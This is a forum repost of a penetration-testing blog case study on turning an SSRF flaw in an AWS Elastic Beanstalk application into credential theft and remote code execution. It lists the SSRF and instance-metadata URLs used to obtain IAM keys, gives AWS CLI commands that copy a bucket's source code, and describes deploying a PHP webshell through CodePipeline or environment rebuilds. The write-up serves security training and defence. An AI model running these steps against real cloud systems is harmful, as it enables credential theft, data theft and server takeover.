Jump to content
Nytro

Exploiting SSRF in AWS Elastic Beanstalk

Recommended Posts

Exploiting SSRF in AWS Elastic Beanstalk

February 1, 2019

In this blog, Sunil Yadav, our lead trainer for “Advanced Web Hacking” training class, will discuss a case study where a Server-Side Request Forgery (SSRF) vulnerability was identified and exploited to gain access to sensitive data such as the source code. Further, the blog discusses the potential areas which could lead to Remote Code Execution (RCE) on the application deployed on AWS Elastic Beanstalk with Continuous Deployment (CD) pipeline.

AWS Elastic Beanstalk

AWS Elastic Beanstalk, is a Platform as a Service (PaaS) offering from AWS for deploying and scaling web applications developed for various environments such as Java, .NET, PHP, Node.js, Python, Ruby and Go. It automatically handles the deployment, capacity provisioning, load balancing, auto-scaling, and application health monitoring.

Provisioning an Environment

AWS Elastic Beanstalk supports Web Server and Worker environment provisioning.

  • Web Server environment –  Typically suited to run a web application or web APIs.
  • Worker Environment – Suited for background jobs, long-running processes.

A new application can be configured by providing some information about the application, environment and uploading application code in the zip or war files.

ebs-environment.jpg

Figure 1: Creating an Elastic Beanstalk Environment

When a new environment is provisioned, AWS creates an S3 Storage bucket, Security Group, an EC2 instance. It also creates a default instance profile, called aws-elasticbeanstalk-ec2-role, which is mapped to the EC2 instance with default permissions.

When the code is deployed from the user computer, a copy of the source code in the zip file is placed in the S3 bucket named elasticbeanstalkregion-account-id.

s3-bucket.jpg

Figure 2: Amazon S3 buckets

Elastic Beanstalk doesn’t turn on default encryption for the Amazon S3 bucket that it creates. This means that by default, objects are stored unencrypted in the bucket (and are accessible only by authorized users).

Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html

Managed Policies for default Instance Profile – aws-elasticbeanstalk-ec2-role:

  • AWSElasticBeanstalkWebTier – Grants permissions for the application to upload logs to Amazon S3 and debugging information to AWS X-Ray.
  • AWSElasticBeanstalkWorkerTier – Grants permissions for log uploads, debugging, metric publication, and worker instance tasks, including queue management, leader election, and periodic tasks.
  • AWSElasticBeanstalkMulticontainerDocker – Grants permissions for the Amazon Elastic Container Service to coordinate cluster tasks.

Policy “AWSElasticBeanstalkWebTier” allows limited List, Read and Write permissions on the S3 Buckets. Buckets are accessible only if bucket name starts with “elasticbeanstalk-”, and recursive access is also granted.

AWSElasticBeanstalkWebTier.jpg

Figure 3: Managed Policy – “AWSElasticBeanstalkWebTier”

Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html

Analysis

While we were continuing with our regular pentest, we came across an occurrence of Server-Side Request Forgery (SSRF) vulnerability in the application. The vulnerability was confirmed by making a DNS Call to an external domain and this was further verified by accessing the “http://localhost/server-status” which was configured to only allow localhost to access it as shown in the Figure 4 below.

http://staging.xxxx-redacted-xxxx.com/view_pospdocument.php?doc=http://localhost/server-status

server-status-page.png

Figure 4: Confirming SSRF by accessing the restricted page

Once SSRF was confirmed, we then moved towards confirming that the service provider is Amazon through server fingerprinting using services such as https://ipinfo.io. Thereafter, we tried querying AWS metadata through multiple endpoints, such as:

  • http://169.254.169.254/latest/dynamic/instance-identity/document
  • http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role

We retrieved the account ID and Region from the API “http://169.254.169.254/latest/dynamic/instance-identity/document”:

instance-identity.jpg

Figure 5: AWS Metadata – Retrieving the Account ID and Region

We then retrieved the Access Key, Secret Access Key, and Token from the API “http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role”:

aws-elasticbeanstalk-ec2-role.png

Figure 6: AWS Metadata – Retrieving the Access Key ID, Secret Access Key, and Token

Note: The IAM security credential of aws-elasticbeanstalk-ec2-role” indicates that the application is deployed on Elastic Beanstalk.

We further configured AWS Command Line Interface(CLI), as shown in Figure 7:

aws-cli.jpg

Figure 7: Configuring AWS Command Line Interface

The output of “aws sts get-caller-identity” command indicated that the token was working fine, as shown in Figure 8:

get-caller-identity.jpg

Figure 8: AWS CLI Output : get-caller-identity 

So, so far, so good. Pretty standard SSRF exploit, right? This is where it got interesting…..

Let’s explore further possibilities

Initially, we tried running multiple commands using AWS CLI to retrieve information from the AWS instance. However, access to most of the commands were denied due to the security policy in place, as shown in Figure 9 below:

s3-access-denied.jpg

Figure 9: Access denied on ListBuckets operation

We also know that the managed policy “AWSElasticBeanstalkWebTier” only allows to access S3 buckets whose name start with “elasticbeanstalk”:

So, in order to access the S3 bucket, we needed to know the bucket name. Elastic Beanstalk creates an Amazon S3 bucket named elasticbeanstalk-region-account-id.

We found out the bucket name using the information retrieved earlier, as shown in Figure 4.

  • Region: us-east-2
  • Account ID: 69XXXXXXXX79

Now, the bucket name is “elasticbeanstalk-us-east-2-69XXXXXXXX79”.

We listed bucket resources for bucket “elasticbeanstalk-us-east-2-69XXXXXXXX79” in a recursive manner using AWS CLI:

aws s3 ls s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/

list-s3-bucket.png

Figure 10: Listing S3 Bucket for Elastic Beanstalk

We got access to the source code by downloading S3 resources recursively as shown in Figure 11.

aws s3 cp s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/ /home/foobar/awsdata –recursive

s3-copy-data.png

Figure 11: Recursively copy all S3 Bucket Data

Pivoting from SSRF to RCE

Now that we had permissions to add an object to an S3 bucket, we uploaded a PHP file (webshell101.php inside the zip file) through AWS CLI in the S3 bucket to explore the possibilities of remote code execution, but it didn’t work as updated source code was not deployed on the EC2 instance, as shown in Figure 12 and Figure 13:

code-upload.jpg

Figure 12: Uploading a webshell through AWS CLI in the S3 bucket

shell-404.jpg

Figure 13: 404 Error page for Web Shell in the current environment

We took this to our lab to explore on some potential exploitation scenarios where this issue could lead us to an RCE. Potential scenarios were:

  • Using CI/CD AWS CodePipeline
  • Rebuilding the existing environment
  • Cloning from an existing environment
  • Creating a new environment with S3 bucket URL

Using CI/CD AWS CodePipeline: AWS CodePipeline is a CI/CD service which builds, tests and deploys code every time there is a change in code (based on the policy). The Pipeline supports GitHub, Amazon S3 and AWS CodeCommit as source provider and multiple deployment providers including Elastic Beanstalk. The AWS official blog on how this works can be found here:

blog-ref.jpg

The software release, in case of our application, is automated using AWS Pipeline, S3 bucket as a source repository and Elastic Beanstalk as a deployment provider.

Let’s first create a pipeline, as seen in Figure 14:

create-pipeline.png

Figure 14: Pipeline settings

Select S3 bucket as source provider, S3 bucket name and enter the object key, as shown in Figure 15:

source.png

Figure 15: Add source stage 

Configure a build provider or skip build stage as shown in Figure 16:

build-stage.png

Figure 16: Skip build stage

Add a deploy provider as Amazon Elastic Beanstalk and select an application created with Elastic Beanstalk, as shown in Figure 17:

deploy.png

Figure 17: Add deploy provider

A new pipeline is created as shown below in Figure 18:

code-pipeline.png

Figure 18: New Pipeline created successfully

Now, it’s time to upload a new file (webshell) in the S3 bucket to execute system level commands as show in Figure 19:

phpwebshell.jpg

Figure 19: PHP webshell

Add the file in the object configured in the source provider as shown in Figure 20:

add-file.jpg

Figure 20: Add webshell in the object

Upload an archive file to S3 bucket using the AWS CLI command, as shown in Figure 21:

copy-webshell-.png

Figure 21: Cope webshell in S3 bucket

aws s3 cp 2019028gtB-InsuranceBroking-stag-v2.0024.zip s3://elasticbeanstalk-us-east-1-696XXXXXXXXX/

The moment the new file is updated, CodePipeline immediately starts the build process and if everything is OK, it will deploy the code on the Elastic Beanstalk environment, as shown in Figure 22:

trigger-pipeline.jpgFigure 22: Pipeline Triggered

Once the pipeline is completed, we can then access the web shell and execute arbitrary commands to the system, as shown in Figure 23.

webshell-1-2.png

Figure 23: Running system level commands 

And here we got a successful RCE!

Rebuilding the existing environment: Rebuilding an environment terminates all of its resources, remove them and create new resources. So in this scenario, it will deploy the latest available source code from the S3 bucket. The latest source code contains the web shell which gets deployed, as shown in Figure 24.

environment-rebuild.jpg

Figure 24: Rebuilding the existing environment

Once the rebuilding process is successfully completed, we can access our webshell and run system level commands on the EC2 instance, as shown in figure 25:

web-shell.jpg

Figure 25: Running system level commands from webshell101.php

Cloning from the existing environment: If the application owner clones the environment, it again takes code from the S3 bucket which will deploy the application with a web shell. Cloning environment process is shown in Figure 26:

clone-1.jpg

Figure 26: Cloning from an existing Environment

Creating a new environment: While creating a new environment, AWS provides two options to deploy code, one for uploading an archive file directly and another to select an existing archive file from the S3 bucket. By selecting the S3 bucket option and providing an S3 bucket URL, the latest source code will be used for deployment. The latest source code contains the web shell which gets deployed.

new-environment.jpg

References:

<BH Marketing>

Our Advanced Web Hacking class at Black Hat USA contains this and many more real-world examples. Registration is now open.

</BH Marketing>

 

Sursa: https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/

  • Upvote 2
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...